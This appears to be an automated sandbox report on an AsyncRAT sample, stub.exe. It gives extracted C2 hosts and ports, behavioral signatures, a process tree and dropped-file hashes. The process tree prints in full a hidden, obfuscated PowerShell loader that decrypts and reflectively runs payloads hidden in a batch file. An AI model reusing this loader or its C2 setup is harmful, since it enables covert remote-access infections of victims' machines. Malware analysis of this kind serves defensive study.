Analysis
-
max time kernel
113s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
09-11-2024 17:02
Behavioral task
behavioral1
Sample
stub.exe
Resource
win7-20240708-en
General
-
Target
stub.exe
-
Size
8.3MB
-
MD5
812c191196807e717082916052bfaa4f
-
SHA1
1b1144a8e914281cb9754ca6f5f8133d35dd01bc
-
SHA256
967d8df2b2b47c97fcb36286731254cc23e81fb92b1ebc1c917e292c3d2740c6
-
SHA512
152b88c1282765ec6971cf81489453f340f91eba9d85ff6dbc7d3daea16088eb2529dfb470d5ade09ccc625bfa37a0a12dd02bb05ffd383fceaa1a5dd78610f0
-
SSDEEP
196608:7GGv8HZ4JFdQmRrdA6lS8Qnf2ODjMnGydS8jyi9IleHq7O2zH:COYsdQOlaF3MnG38jyi9IleKqkH
Malware Config
Extracted
asyncrat
Default
127.0.0.1:55496
127.0.0.1:37754
tcp://nasdnasnd-55496.portmap.host:55496:55496
tcp://nasdnasnd-55496.portmap.host:55496:37754
tcp://nasdnasnd-55496.portmap.host:55496
tcp://nasdnasnd-55496.portmap.host:37754
floor-getting.gl.at.ply.gg:55496
floor-getting.gl.at.ply.gg:37754
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3256-80-0x0000024260650000-0x0000024260666000-memory.dmp family_asyncrat -
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exeflow pid Process 39 3256 powershell.exe 41 3256 powershell.exe 44 3256 powershell.exe 45 3256 powershell.exe 53 3256 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Loads dropped DLL 20 IoCs
Processes:
stub.exepid Process 4412 stub.exe 4412 stub.exe 4412 stub.exe 4412 stub.exe 4412 stub.exe 4412 stub.exe 4412 stub.exe 4412 stub.exe 4412 stub.exe 4412 stub.exe 4412 stub.exe 4412 stub.exe 4412 stub.exe 4412 stub.exe 4412 stub.exe 4412 stub.exe 4412 stub.exe 4412 stub.exe 4412 stub.exe 4412 stub.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid Process 14756 timeout.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid Process 7208 ipconfig.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid Process 3256 powershell.exe 3256 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 3256 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
stub.exestub.execmd.exepowershell.execmd.execmd.exedescription pid Process procid_target PID 2800 wrote to memory of 4412 2800 stub.exe 83 PID 2800 wrote to memory of 4412 2800 stub.exe 83 PID 4412 wrote to memory of 2924 4412 stub.exe 87 PID 4412 wrote to memory of 2924 4412 stub.exe 87 PID 4412 wrote to memory of 2160 4412 stub.exe 89 PID 4412 wrote to memory of 2160 4412 stub.exe 89 PID 4412 wrote to memory of 4356 4412 stub.exe 91 PID 4412 wrote to memory of 4356 4412 stub.exe 91 PID 4356 wrote to memory of 3256 4356 cmd.exe 93 PID 4356 wrote to memory of 3256 4356 cmd.exe 93 PID 3256 wrote to memory of 6104 3256 powershell.exe 103 PID 3256 wrote to memory of 6104 3256 powershell.exe 103 PID 6104 wrote to memory of 6812 6104 cmd.exe 105 PID 6104 wrote to memory of 6812 6104 cmd.exe 105 PID 6104 wrote to memory of 7208 6104 cmd.exe 106 PID 6104 wrote to memory of 7208 6104 cmd.exe 106 PID 3256 wrote to memory of 14700 3256 powershell.exe 107 PID 3256 wrote to memory of 14700 3256 powershell.exe 107 PID 14700 wrote to memory of 14756 14700 cmd.exe 109 PID 14700 wrote to memory of 14756 14700 cmd.exe 109 -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid Process 2924 attrib.exe 2160 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\stub.exe"C:\Users\Admin\AppData\Local\Temp\stub.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Users\Admin\AppData\Local\Temp\stub.exe"C:\Users\Admin\AppData\Local\Temp\stub.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4412 -
C:\Windows\SYSTEM32\attrib.exeattrib +h C:\Users\Admin\AppData\Roaming\HiddenDownloads3⤵
- Views/modifies file attributes
PID:2924
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +h C:\Users\Admin\AppData\Roaming\HiddenDownloads\Infect1ed.bat3⤵
- Views/modifies file attributes
PID:2160
-
-
C:\Windows\SYSTEM32\cmd.execmd /c C:\Users\Admin\AppData\Roaming\HiddenDownloads\Infect1ed.bat3⤵
- Suspicious use of WriteProcessMemory
PID:4356 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PEyYh1n8VzYpr21/IXl51llHEBPi1h78+H+NUvA+uSQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('G2HEgLk6pcvHDZUSbthIeg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fpNLi=New-Object System.IO.MemoryStream(,$param_var); $gtpiv=New-Object System.IO.MemoryStream; $BIEih=New-Object System.IO.Compression.GZipStream($fpNLi, [IO.Compression.CompressionMode]::Decompress); $BIEih.CopyTo($gtpiv); $BIEih.Dispose(); $fpNLi.Dispose(); $gtpiv.Dispose(); $gtpiv.ToArray();}function execute_function($param_var,$param2_var){ $oCrgP=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $bcgwz=$oCrgP.EntryPoint; $bcgwz.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\HiddenDownloads\Infect1ed.bat';$KYofG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\HiddenDownloads\Infect1ed.bat').Split([Environment]::NewLine);foreach ($RsYgi in $KYofG) { if ($RsYgi.StartsWith(':: ')) { $lhLhP=$RsYgi.Substring(3); break; }}$payloads_var=[string[]]$lhLhP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3256 -
C:\Windows\SYSTEM32\cmd.exe"cmd"5⤵
- Suspicious use of WriteProcessMemory
PID:6104 -
C:\Windows\system32\help.exehelp6⤵PID:6812
-
-
C:\Windows\system32\ipconfig.exeipconfig6⤵
- Gathers network information
PID:7208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp67B9.tmp.bat""5⤵
- Suspicious use of WriteProcessMemory
PID:14700 -
C:\Windows\system32\timeout.exetimeout 36⤵
- Delays execution with timeout.exe
PID:14756
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
96KB
MD5f12681a472b9dd04a812e16096514974
SHA16fd102eb3e0b0e6eef08118d71f28702d1a9067c
SHA256d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8
SHA5127d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2
-
Filesize
801KB
MD5d9fc15caf72e5d7f9a09b675e309f71d
SHA1cd2b2465c04c713bc58d1c5de5f8a2e13f900234
SHA2561fcd75b03673904d9471ec03c0ef26978d25135a2026020e679174bdef976dcf
SHA51284f705d52bd3e50ac412c8de4086c18100eac33e716954fbcb3519f4225be1f4e1c3643d5a777c76f7112fae30ce428e0ce4c05180a52842dacb1f5514460006
-
Filesize
81KB
MD54101128e19134a4733028cfaafc2f3bb
SHA166c18b0406201c3cfbba6e239ab9ee3dbb3be07d
SHA2565843872d5e2b08f138a71fe9ba94813afee59c8b48166d4a8eb0f606107a7e80
SHA5124f2fc415026d7fd71c5018bc2ffdf37a5b835a417b9e5017261849e36d65375715bae148ce8f9649f9d807a63ac09d0fb270e4abae83dfa371d129953a5422ca
-
Filesize
245KB
MD5d47e6acf09ead5774d5b471ab3ab96ff
SHA164ce9b5d5f07395935df95d4a0f06760319224a2
SHA256d0df57988a74acd50b2d261e8b5f2c25da7b940ec2aafbee444c277552421e6e
SHA51252e132ce94f21fa253fed4cf1f67e8d4423d8c30224f961296ee9f64e2c9f4f7064d4c8405cd3bb67d3cf880fe4c21ab202fa8cf677e3b4dad1be6929dbda4e2
-
Filesize
62KB
MD5de4d104ea13b70c093b07219d2eff6cb
SHA183daf591c049f977879e5114c5fea9bbbfa0ad7b
SHA25639bc615842a176db72d4e0558f3cdcae23ab0623ad132f815d21dcfbfd4b110e
SHA512567f703c2e45f13c6107d767597dba762dc5caa86024c87e7b28df2d6c77cd06d3f1f97eed45e6ef127d5346679fea89ac4dc2c453ce366b6233c0fa68d82692
-
Filesize
154KB
MD5337b0e65a856568778e25660f77bc80a
SHA14d9e921feaee5fa70181eba99054ffa7b6c9bb3f
SHA256613de58e4a9a80eff8f8bc45c350a6eaebf89f85ffd2d7e3b0b266bf0888a60a
SHA51219e6da02d9d25ccef06c843b9f429e6b598667270631febe99a0d12fc12d5da4fb242973a8351d3bf169f60d2e17fe821ad692038c793ce69dfb66a42211398e
-
Filesize
30KB
MD5ff8300999335c939fcce94f2e7f039c0
SHA14ff3a7a9d9ca005b5659b55d8cd064d2eb708b1a
SHA2562f71046891ba279b00b70eb031fe90b379dbe84559cf49ce5d1297ea6bf47a78
SHA512f29b1fd6f52130d69c8bd21a72a71841bf67d54b216febcd4e526e81b499b9b48831bb7cdff0bff6878aab542ca05d6326b8a293f2fb4dd95058461c0fd14017
-
Filesize
76KB
MD58140bdc5803a4893509f0e39b67158ce
SHA1653cc1c82ba6240b0186623724aec3287e9bc232
SHA25639715ef8d043354f0ab15f62878530a38518fb6192bc48da6a098498e8d35769
SHA512d0878fee92e555b15e9f01ce39cfdc3d6122b41ce00ec3a4a7f0f661619f83ec520dca41e35a1e15650fb34ad238974fe8019577c42ca460dde76e3891b0e826
-
Filesize
155KB
MD5069bccc9f31f57616e88c92650589bdd
SHA1050fc5ccd92af4fbb3047be40202d062f9958e57
SHA256cb42e8598e3fa53eeebf63f2af1730b9ec64614bda276ab2cd1f1c196b3d7e32
SHA5120e5513fbe42987c658dba13da737c547ff0b8006aecf538c2f5cf731c54de83e26889be62e5c8a10d2c91d5ada4d64015b640dab13130039a5a8a5ab33a723dc
-
Filesize
23KB
MD59a4957bdc2a783ed4ba681cba2c99c5c
SHA1f73d33677f5c61deb8a736e8dde14e1924e0b0dc
SHA256f7f57807c15c21c5aa9818edf3993d0b94aef8af5808e1ad86a98637fc499d44
SHA512027bdcb5b3e0ca911ee3c94c42da7309ea381b4c8ec27cf9a04090fff871db3cf9b7b659fdbcfff8887a058cb9b092b92d7d11f4f934a53be81c29ef8895ac2b
-
Filesize
1.4MB
MD5d0ad2b400f15d1bbaf48c8908bee5b0f
SHA1c3f25ea44c69180bc7dff7f2615a4010badc9b4e
SHA256b178b21bd1653a95b626840f565806b8e121962db6b3ae332632d5948323263e
SHA512516183b61b5b65031b07876f4f35f6436cc6cd5b0c395ba18f96d42082e700b88d95bf48e029300674001bba9a8a9820e7e96134f3c55b9d457aba479dff955c
-
Filesize
292KB
MD550ea156b773e8803f6c1fe712f746cba
SHA12c68212e96605210eddf740291862bdf59398aef
SHA25694edeb66e91774fcae93a05650914e29096259a5c7e871a1f65d461ab5201b47
SHA51201ed2e7177a99e6cb3fbef815321b6fa036ad14a3f93499f2cb5b0dae5b713fd2e6955aa05f6bda11d80e9e0275040005e5b7d616959b28efc62abb43a3238f0
-
Filesize
10KB
MD5cbf62e25e6e036d3ab1946dbaff114c1
SHA1b35f91eaf4627311b56707ef12e05d6d435a4248
SHA25606032e64e1561251ea3035112785f43945b1e959a9bf586c35c9ea1c59585c37
SHA51204b694d0ae99d5786fa19f03c5b4dd8124c4f9144cfe7ca250b48a3c0de0883e06a6319351ae93ea95b55bbbfa69525a91e9407478e40ad62951f1d63d45ff18
-
Filesize
118KB
MD5bac273806f46cffb94a84d7b4ced6027
SHA1773fbc0435196c8123ee89b0a2fc4d44241ff063
SHA2561d9aba3ff1156ea1fbe10b8aa201d4565ae6022daf2117390d1d8197b80bb70b
SHA512eaec1f072c2c0bc439ac7b4e3aea6e75c07bd4cd2d653be8500bbffe371fbfe045227daead653c162d972ccaadff18ac7da4d366d1200618b0291d76e18b125c
-
Filesize
3.3MB
MD56f4b8eb45a965372156086201207c81f
SHA18278f9539463f0a45009287f0516098cb7a15406
SHA256976ce72efd0a8aeeb6e21ad441aa9138434314ea07f777432205947cdb149541
SHA5122c5c54842aba9c82fb9e7594ae9e264ac3cbdc2cc1cd22263e9d77479b93636799d0f28235ac79937070e40b04a097c3ea3b7e0cd4376a95ed8ca90245b7891f
-
Filesize
686KB
MD58769adafca3a6fc6ef26f01fd31afa84
SHA138baef74bdd2e941ccd321f91bfd49dacc6a3cb6
SHA2562aebb73530d21a2273692a5a3d57235b770daf1c35f60c74e01754a5dac05071
SHA512fac22f1a2ffbfb4789bdeed476c8daf42547d40efe3e11b41fadbc4445bb7ca77675a31b5337df55fdeb4d2739e0fb2cbcac2feabfd4cd48201f8ae50a9bd90b
-
Filesize
64KB
MD534e49bb1dfddf6037f0001d9aefe7d61
SHA1a25a39dca11cdc195c9ecd49e95657a3e4fe3215
SHA2564055d1b9e553b78c244143ab6b48151604003b39a9bf54879dee9175455c1281
SHA512edb715654baaf499cf788bcacd5657adcf9f20b37b02671abe71bda334629344415ed3a7e95cb51164e66a7aa3ed4bf84acb05649ccd55e3f64036f3178b7856
-
Filesize
5.5MB
MD59a24c8c35e4ac4b1597124c1dcbebe0f
SHA1f59782a4923a30118b97e01a7f8db69b92d8382a
SHA256a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7
SHA5129d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b
-
Filesize
28KB
MD597ee623f1217a7b4b7de5769b7b665d6
SHA195b918f3f4c057fb9c878c8cc5e502c0bd9e54c0
SHA2560046eb32f873cde62cf29af02687b1dd43154e9fd10e0aa3d8353d3debb38790
SHA51220edc7eae5c0709af5c792f04a8a633d416da5a38fc69bd0409afe40b7fb1afa526de6fe25d8543ece9ea44fd6baa04a9d316ac71212ae9638bdef768e661e0f
-
Filesize
1.1MB
MD5bc58eb17a9c2e48e97a12174818d969d
SHA111949ebc05d24ab39d86193b6b6fcff3e4733cfd
SHA256ecf7836aa0d36b5880eb6f799ec402b1f2e999f78bfff6fb9a942d1d8d0b9baa
SHA5124aa2b2ce3eb47503b48f6a888162a527834a6c04d3b49c562983b4d5aad9b7363d57aef2e17fe6412b89a9a3b37fb62a4ade4afc90016e2759638a17b1deae6c
-
Filesize
507KB
MD556db4a861aec914a860461dedcdca0a0
SHA18535a8c9eac371a54308795a8bbe89414933e035
SHA2566ab611c4a24406d9d97f09d49d50142ab2734b69a2b0d9ea6489e4af90c4a2a4
SHA512600a21666e9ed334de5b4b17f60136434ee485c80f9740e6085e24ef95ca5376e6223a54c6b1c8f12987edab5d89af9676cc12e2a335f4c4e9ab79dfef8e4b90
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
171B
MD5af4d195df3f79bed0ca011dc38815dcc
SHA1fec5b9dd4784a0c080e095eb84c9876f73247682
SHA256912e594e73af413678701e8d647a9d3a3e1b8872b14668070d44cc41e8f889f8
SHA5127cc51086f71efcdeb9301059ad27f6117b68573888e8573914dc13b58db32de7b692720ed3e79282e7030348e7bc5aea5e6ba96a4da578121544f72ab642d560
-
Filesize
277KB
MD59a0c13597c06fde5880fefab3866e9b5
SHA1e3741ecab92f2395215a11ce86a752f9cb8de45a
SHA2567040e23d2fb55f974503328406df36a6d6dac1b8835e00d54a70ebf9c080f843
SHA5127127132f0ae4207a2025bb317b57d89d16cf8d3469affeb4e717e4814cfd1d8fd4b6f8b38b38f350017e7de025f90bfb183743a5391336e6b78c795fd75d7888